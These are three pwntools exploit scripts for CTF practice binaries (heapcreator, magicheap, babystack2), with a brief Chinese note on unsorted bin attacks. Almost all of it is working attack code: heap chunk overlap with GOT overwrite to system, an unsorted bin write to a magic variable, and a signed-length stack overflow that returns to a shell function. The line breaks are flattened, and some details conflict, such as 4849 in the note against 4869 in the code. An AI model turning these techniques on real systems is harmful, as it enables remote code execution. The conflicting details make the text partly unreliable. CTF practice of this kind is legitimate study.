from pwn import * from LibcSearcher import* context.log_level='debug'
pe='./heapcreator' libc_23='./libc-2.23.so' libc_27='./libc-2.27.so' ip,port = 'node3.buuoj.cn',25568 elf=ELF(pe) libc=ELF(libc_23)
if args['REMOTE']: p = remote(ip,port) else: p = process(pe)
def get_one(): if(arch == '64'): if(version == '2.23'): one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
if (version == '2.27'): one = [0x4f365, 0x4f3c2, 0x10a45c]
return one
def add(size,context): p.sendafter('Your choice :','1') p.sendafter('Size of Heap : ',str(size)) p.sendafter('Content of heap:',str(context))
def edit(index,context): p.sendafter('Your choice :','2') p.sendafter('Index :',str(index)) p.sendafter('Content of heap : ',str(context))
def show(idx): p.recvuntil('choice :') p.sendline('3') p.recvuntil(' :') p.sendline(str(idx))
def de(index): p.sendafter('Your choice :','4') p.sendafter('Index :',str(index))
def main(): add(0x18,'aaaa') add(0x10,'bbbb') add(0x10,'cccc') edit(0,'/bin/sh\x00'+p64(0)*2+'\x81') de(1) add(0x70,p64(0)*8+p64(0x8)+p64(elf.got['free'])) show(2) free_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) bin_sh_libc=next(libc.search("/bin/sh")) system_libc=libc.symbols['system'] free_libc=libc.symbols['free'] offset=free_addr-free_libc system_addr=system_libc+offset bin_addr=bin_sh_libc+offset success('free_addr ' + hex(free_addr)) success("system: " + hex(system_addr)) success("bin_addr: " + hex(bin_addr)) edit(2,p64(system_addr)) de(0)
p.interactive() if __name__ == '__main__': main()
利用 unsorted bin attack 覆盖 magic>0x1305,然后输入 v3= 4849, 就可以拿到 shell了。
(chunk 2 是为了防止 free chunk 1 的时候 chunk 1 与 top chunk 合并,chunk0,chunk2的大小随意,chunk1的大小要>0x80(fast bin最大为0x80),这样free它的时候会进入到unsorted bin(chunk在被释放后,如果其大小不在fast bin的范围内,会被先放到unsorted bin,在申请内存的时候如果大小不是fast bin大小的内存并且在small bin中没有找到合适的chunk,就会去unsorted中寻找。《N1BOOK》p367))
from pwn import * from LibcSearcher import* context.log_level='debug'
pe='./magicheap' libc_23='/lib/x86_64-linux-gnu/libc.so.6' libc_27='./libc-2.27.so' ip,port = 'node3.buuoj.cn',26272 elf=ELF(pe) libc=ELF(libc_23)
if args['REMOTE']: p = remote(ip,port) else: p = process(pe)
def get_one(): if(arch == '64'): if(version == '2.23'): one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
if (version == '2.27'): one = [0x4f365, 0x4f3c2, 0x10a45c]
return one
def add(size,context): p.sendafter('Your choice :','1') p.sendafter('Size of Heap : ',str(size)) p.sendafter('Content of heap:',str(context))
def edit(index,size,context): p.sendafter('Your choice :','2') p.sendafter('Index :',str(index)) p.sendafter('Size of Heap : ',str(size)) p.sendafter('Content of heap : ',str(context))
def de(index): p.sendafter('Your choice :','3') p.sendafter('Index :',str(index))
def main(): add(0x20,'aaaa') add(0x80,'bbbb') add(0x10,'cccc') de(1) magic=0x6020A0 edit(0,0x50,0x20 * "a" + p64(0)+p64(0x91)+p64(0)+p64(magic-10)) add(0x80,'dddd') p.sendafter(':','4869')
p.interactive() if __name__ == '__main__': main()
from pwn import * from LibcSearcher import* context.log_level='debug'
pe='./bjdctf_2020_babystack2' libc_23='./libc-2.23.so' libc_27='./libc-2.27.so' ip,port = 'node3.buuoj.cn',26309 elf=ELF(pe) libc=ELF(libc_23)
if args['REMOTE']: p = remote(ip,port) else: p = process(pe)
def get_one(): if(arch == '64'): if(version == '2.23'): one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
if (version == '2.27'): one = [0x4f365, 0x4f3c2, 0x10a45c]
return one
def main(): shell_addr = 0x0400726 p.recv() p.sendline('-1') p.recv() payload = '\x00'*0x10 + 'bbbbbbbb' + p64(shell_addr) p.send(payload) p.interactive()
if __name__ == '__main__': main()